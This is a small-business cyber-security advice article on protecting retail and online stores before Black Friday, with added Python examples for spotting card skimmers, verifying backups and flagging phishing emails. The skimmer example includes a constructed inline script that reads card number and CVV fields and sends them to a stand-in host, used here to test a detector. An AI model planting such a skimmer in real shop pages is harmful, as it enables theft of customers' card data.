5 ways SMEs can protect their retail and online stores ahead of Black Friday

In the last 12 months, 1 in 8 retailers faced a cyber-attack, according to data published in a report by the financial auditor Grant Thornton.


One of the reasons why cyber criminals take an interest in the retail sector is due to the level of customer data that is collected, particularly through ecommerce and online shopping platforms.


In 2018, fashion retailer SHEIN suffered a data breach that affected in the region of 6.42 million customers. Cyber criminals were able to gain access to the company’s servers and steal the personal information of SHEIN’s customers.


No retail business is too small or too large to need cyber security: whether you have 10 customers or 10,000, the information you hold on them is of real value to cyber criminals.


Why are retail and ecommerce businesses of interest?

Recent research by PwC on their client base revealed that cyber-attacks on their retail clients had increased by over 30%, demonstrating that the retail and ecommerce industry is of interest to cyber criminals.


Within only a few months, the pandemic accelerated the shift to ecommerce/online stores by five years, meaning there is now more public and private data stored in the cloud than ever before.


In the two years from March 2019 to March 2021, there was an 8% increase in the opening of retail businesses. And, with 98% of UK businesses now operational online in one way or another, benefiting hugely from the use of websites, social media, staff email addresses, online banking, and the ability for customers to shop online, it is no surprise that cybercrime is on the up.


What type of attacks are retail and ecommerce businesses facing?

Attacks on web applications, such as a company's online payment system, are reported in the Verizon 2019 Data Breach Investigations Report to be the most common type of attack suffered by retail companies. Here the attacker breaches the payment page or checkout flow and plants malicious code that skims customers' card details as they are typed in (the technique is widely known as web skimming, or Magecart). The stolen card data is then typically sold on to other criminals for a profit.
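As an added illustration (not from the original article), the Python below shows what a planted skimmer on a checkout page looks like and one quick check a shop owner or developer can run against the HTML their checkout actually serves: every script on the page is compared against the hosts the shop expects to load code from, and any inline script that reads card fields and talks to a host outside that list is flagged. The checkout page, the allowed hosts and the attacker's domain are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed checkout page. The first two scripts are the shop's own code and
# its payment provider's SDK; the inline script at the end was planted by an
# attacker and posts the card details to a look-alike "stats" domain.
# Every hostname here is invented for the example.
CHECKOUT_HTML = """
<html><body>
<form id="checkout">
  <input name="card_number"><input name="expiry"><input name="cvv">
</form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://pay.example-psp.com/v1/sdk.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=card_number]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://cdn-stat.example.net/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

# Hosts the shop's developers know they load scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "pay.example-psp.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
CARD_FIELD_RE = re.compile(r"card_number|cvv|cvc|expiry", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'()]+""", re.IGNORECASE)


def find_unexpected_scripts(html, allowed_hosts):
    """Return (reason, detail) findings for scripts that should not be on a checkout page.

    External scripts are flagged when their host is not on the allow list.
    Inline scripts are flagged when they touch card fields *and* reference a
    URL on a host outside the allow list, which is the signature of a skimmer
    sending captured data out.
    """
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()
            if host not in allowed_hosts:
                findings.append(("external script from unexpected host", src.group(1)))
            continue
        if CARD_FIELD_RE.search(body):
            foreign = [u for u in URL_RE.findall(body)
                       if (urlparse(u).hostname or "").lower() not in allowed_hosts]
            if foreign:
                findings.append(("inline script reads card fields and contacts unexpected host",
                                 foreign[0]))
    return findings


if __name__ == "__main__":
    for reason, detail in find_unexpected_scripts(CHECKOUT_HTML, ALLOWED_SCRIPT_HOSTS):
        print(f"{reason}: {detail}")
```

This is a sanity check on served HTML, not a substitute for the production controls: a Content Security Policy that only permits scripts from the expected hosts, and Subresource Integrity hashes on the scripts you do load. The check above will not catch a skimmer hidden inside a legitimately hosted third-party script that has itself been compromised; that is exactly the case integrity hashes exist for.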


Another common type of attack on both the retail industry and the food and beverage industry is the point-of-sale (POS) attack, where malware is installed on the systems used to take payments. The malware is designed to capture customer payment data, particularly card data, from checkout systems.


Retail and ecommerce businesses also face attacks on their websites themselves. A distributed denial-of-service (DDoS) attack, for example, attempts to overwhelm an ecommerce platform with floods of traffic or bogus activity such as fake online orders and spam customer-service enquiries; the site goes offline, sales are lost and customers are frustrated.


Five top tips

Retailers should take a close look at their cyber security to understand the risks of running a retail or ecommerce store. To help, we have put together five top tips to protect your business from a cyber-attack.

Use strong passwords and store them securely

Passwords are your first level of protection when it comes to securing your online accounts or customer data. Complex passwords can be difficult to remember, which often leads people to choose weaker passwords or reuse them across multiple accounts. The National Cyber Security Centre (NCSC) encourages businesses to use three random words, such as HouseForestFlower, to help protect against common attacks like brute force, where an attacker tries many passwords in the hope of guessing the right one.

The aim is not to make the password so complicated that you cannot remember it, but hard enough that criminals struggle to crack it. Adding symbols, capital letters and numbers makes it stronger still.

Default passwords must always be changed to something unique, and a password should also be changed if you see any suspicious activity on the account.


To help you keep track of all your passwords, use a password manager. It runs on a phone, tablet or computer and stores your passwords securely, so every account can have its own strong password without you having to remember them all.


Double up your cyber protection

Two-factor authentication, otherwise known as 2FA, two-step verification or multi-factor authentication (MFA), is designed to stop cyber criminals accessing your accounts even if they obtain your password.


With 2FA, any new device trying to log in or make account changes must pass a second check before access is given. Common methods include a single-use code sent by SMS, email or phone call, or generated by a smartphone authenticator app. Codes from an authenticator app, or a hardware security key, are harder to intercept than codes sent by SMS, so prefer those where the service offers them.


Below are instructions on how to turn on 2FA for the most common email systems and for four popular social media channels:



Regularly back up your data and isolate it

Think about how much you rely on your business-critical data, such as customer details, quotes, orders and payment details (or coursework and examination files for an education establishment). Now imagine how long you could operate without it.


All businesses, regardless of size and type, should take regular backups of their important data, make sure those backups are recent, and test them so you are confident they can be restored.

Ransomware (and other malware) can often spread automatically to attached storage, which means a backup that is left connected can be encrypted along with everything else, leaving you with nothing to recover from. To keep your files and data safe, protect digital backups with a password or encryption and keep them isolated from the network they came from: offline, or on separate storage that your production systems cannot write to.
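As an added example (not part of the original article) of what "tested so you are confident they can be restored" looks like in practice, the Python below takes a backup of a directory, records a hash of every file in a manifest authenticated with an HMAC key that is kept off the backup media, and then verifies the backup by restoring it into a scratch directory and checking every file against the manifest. The demo() function walks through a constructed scenario: a good backup, the same archive re-taken after ransomware has overwritten one file, and finally a manifest an attacker has edited to match. The file contents and the key are made up for the example; in practice the archive itself would also be encrypted with a tool such as gpg or age, which this snippet leaves out.

```python
import hashlib
import hmac
import json
import os
import tarfile
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def make_backup(src_dir, archive_path, manifest_key):
    """Archive src_dir to archive_path and write archive_path + '.manifest'
    listing a SHA-256 for every file, authenticated with HMAC(manifest_key).
    The key must live somewhere the backup media cannot reach."""
    hashes = {}
    with tarfile.open(archive_path, "w:gz") as tar:
        for root, _, files in os.walk(src_dir):
            for name in sorted(files):
                full = os.path.join(root, name)
                rel = os.path.relpath(full, src_dir)
                hashes[rel] = sha256_file(full)
                tar.add(full, arcname=rel)
    body = json.dumps(hashes, sort_keys=True).encode()
    tag = hmac.new(manifest_key, body, hashlib.sha256).hexdigest()
    with open(archive_path + ".manifest", "w") as f:
        json.dump({"files": hashes, "hmac": tag}, f)
    return hashes


def verify_restore(archive_path, manifest_key):
    """Restore the archive into a scratch directory and check every file
    against the manifest. Returns (ok, list_of_problems)."""
    with open(archive_path + ".manifest") as f:
        manifest = json.load(f)
    body = json.dumps(manifest["files"], sort_keys=True).encode()
    expected = hmac.new(manifest_key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["hmac"]):
        return False, ["manifest HMAC mismatch: manifest altered or wrong key"]
    problems = []
    # Python 3.12+ can refuse archive entries that try to escape the target directory.
    extract_opts = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tempfile.TemporaryDirectory() as scratch:
        try:
            with tarfile.open(archive_path, "r:gz") as tar:
                tar.extractall(scratch, **extract_opts)
        except (tarfile.TarError, OSError, EOFError) as exc:
            return False, [f"archive unreadable: {exc}"]
        for rel, digest in sorted(manifest["files"].items()):
            path = os.path.join(scratch, rel)
            if not os.path.isfile(path):
                problems.append(f"missing after restore: {rel}")
            elif sha256_file(path) != digest:
                problems.append(f"content mismatch: {rel}")
    return not problems, problems


def demo():
    """Constructed scenario; returns the three verification results."""
    key = b"manifest-key-kept-off-the-backup-media"  # made up for the example
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "shopdata")
        os.makedirs(src)
        with open(os.path.join(src, "orders.csv"), "w") as f:
            f.write("id,total\n1,19.99\n")
        with open(os.path.join(src, "customers.csv"), "w") as f:
            f.write("id,email\n1,buyer@example.com\n")
        archive = os.path.join(work, "backup.tar.gz")
        make_backup(src, archive, key)
        good = verify_restore(archive, key)

        # 1) Ransomware overwrites a file and the archive is re-taken from the
        #    poisoned data while the old manifest is left in place.
        with open(os.path.join(src, "orders.csv"), "wb") as f:
            f.write(os.urandom(32))
        with tarfile.open(archive, "w:gz") as tar:
            for name in os.listdir(src):
                tar.add(os.path.join(src, name), arcname=name)
        poisoned_archive = verify_restore(archive, key)

        # 2) The attacker also edits the manifest to match, but has no key.
        with open(archive + ".manifest") as f:
            manifest = json.load(f)
        manifest["files"]["orders.csv"] = sha256_file(os.path.join(src, "orders.csv"))
        with open(archive + ".manifest", "w") as f:
            json.dump(manifest, f)
        edited_manifest = verify_restore(archive, key)
    return good, poisoned_archive, edited_manifest


if __name__ == "__main__":
    for label, result in zip(("good backup", "poisoned archive", "edited manifest"), demo()):
        print(label, result)
```

The restore test is the part most small businesses skip: a backup job that "ran successfully" tells you nothing until something has actually been restored from it and checked. Run verify_restore on a schedule, on a machine that is not the one being backed up, and alert when it returns anything other than (True, []).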


By doing this you ensure your business can still function after a flood, fire, physical damage or theft. And if you have backups you can quickly recover from, a ransomware attack loses most of its leverage: you can restore rather than pay. Bear in mind that many ransomware groups also steal data before encrypting it and threaten to publish it, which backups alone do not prevent.


Don’t hate the update

Every piece of software your business uses, whether payment transaction software or a digital stock management system, is a potential route to unauthorised access and exploitation.


If your business depends on being connected to the internet, you must keep computers, devices, applications and software patched and up to date, and where you can, use two-factor authentication alongside strong passwords.


Regularly patching and installing software updates protects your devices because updates fix newly discovered flaws and vulnerabilities. Once a fix is published, the flaw it addresses becomes public knowledge, and cyber criminals use it to attack the devices that have not yet been updated and to steal data. Installing updates as soon as possible closes that window.


When setting up new devices you should also remove any unnecessary pre-installed software, while ensuring that they have firewall protection enabled and are running up-to-date anti-virus software.





Pay attention to detail

Human error is one of the main contributing factors in the majority of cyber security breaches; in fact, it is reported that 95% of cyber security breaches are primarily caused by human error.


While people can often be the weakest link in the chain, if educated they can become your strongest asset in protecting your business. Cyber criminals will try to lure your employees through a tactic known as social engineering: a person is tricked into taking an action, such as clicking a malicious link in an email or opening a malicious attachment (a phishing email).


The key to security awareness training is to give all your employees enough awareness to combat these threats. Employees need to be taught which clues indicate a threat, and how to respond when they see them.
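To make "clues to look for" concrete, here is an added Python example (not from the original article) that scans a constructed phishing email for three of the most common tells: a display name that shows a different email address from the real sender, a Reply-To that goes somewhere else, and a link whose visible text shows one web address while the underlying link goes to another. Every name, address and domain in the sample is invented.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed phishing email. Every name, address and domain is invented.
SAMPLE_EMAIL = (
    'From: "noreply@parcel-delivery.example" <billing@mail-notify-77.example.net>\n'
    "Reply-To: accounts@another-host.example.org\n"
    "Subject: Action required: your Black Friday stock order is on hold\n"
    "Content-Type: text/html\n"
    "\n"
    "<p>Your card payment failed. Confirm your details within 24 hours at\n"
    '<a href="http://mail-notify-77.example.net/login">https://shop.example/orders</a>\n'
    "or your order will be cancelled.</p>\n"
)

ANCHOR_RE = re.compile(r"""<a\b[^>]*href\s*=\s*["']([^"']+)["'][^>]*>(.*?)</a>""",
                       re.IGNORECASE | re.DOTALL)
TAG_RE = re.compile(r"<[^>]+>")
# A domain-looking token in visible link text, e.g. "https://shop.example/orders".
DOMAIN_IN_TEXT_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.IGNORECASE)
EMAIL_IN_NAME_RE = re.compile(r"[\w.+-]+@((?:[\w-]+\.)+[\w-]+)")


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def phishing_indicators(raw_message):
    """Return a list of human-readable warnings for the classic header and link tells."""
    msg = message_from_string(raw_message)
    findings = []

    display_name, sender = parseaddr(msg.get("From", ""))
    sender_domain = domain_of(sender)
    shown = EMAIL_IN_NAME_RE.search(display_name)
    if shown and shown.group(1).lower() != sender_domain:
        findings.append(f"display name shows {shown.group(1)} but the real sender is {sender_domain}")

    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and domain_of(reply_to) != sender_domain:
        findings.append(f"replies go to {domain_of(reply_to)}, not to {sender_domain}")

    body = (msg.get_payload(decode=True) or b"").decode("utf-8", errors="replace")
    for href, text in ANCHOR_RE.findall(body):
        target = (urlparse(href).hostname or "").lower()
        visible = DOMAIN_IN_TEXT_RE.search(TAG_RE.sub("", text))
        if visible and visible.group(1).lower() != target:
            findings.append(f"link text shows {visible.group(1)} but points to {target}")
    return findings


if __name__ == "__main__":
    for warning in phishing_indicators(SAMPLE_EMAIL):
        print("WARNING:", warning)
```

These are the same checks a trained employee makes by hand: hover over the link and compare it with the text, look at the actual sender address rather than the friendly name, and be suspicious of urgency ("within 24 hours") combined with any of the above. The script is a teaching aid, not a filter; a real mail gateway also checks SPF, DKIM and DMARC and the reputation of the linked domains.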


Discover how our security awareness training could help your business here.


The contents of this website are provided for general information only and are not intended to replace specific professional advice relevant to your situation. The intention of The Cyber Resilience Centre for the South East is to encourage cyber resilience by raising issues and disseminating information on the experiences and initiatives of others. Articles on the website cannot by their nature be comprehensive and may not reflect most recent legislation, practice, or application to your circumstances. The Cyber Resilience Centre for the South East provides affordable services and Trusted Partners if you need specific support. For specific questions please contact us.

The Cyber Resilience Centre for the South East does not accept any responsibility for any loss which may arise from reliance on information or materials published on this document. The Cyber Resilience Centre for the South East is not responsible for the content of external internet sites that link to this site or which are linked from it.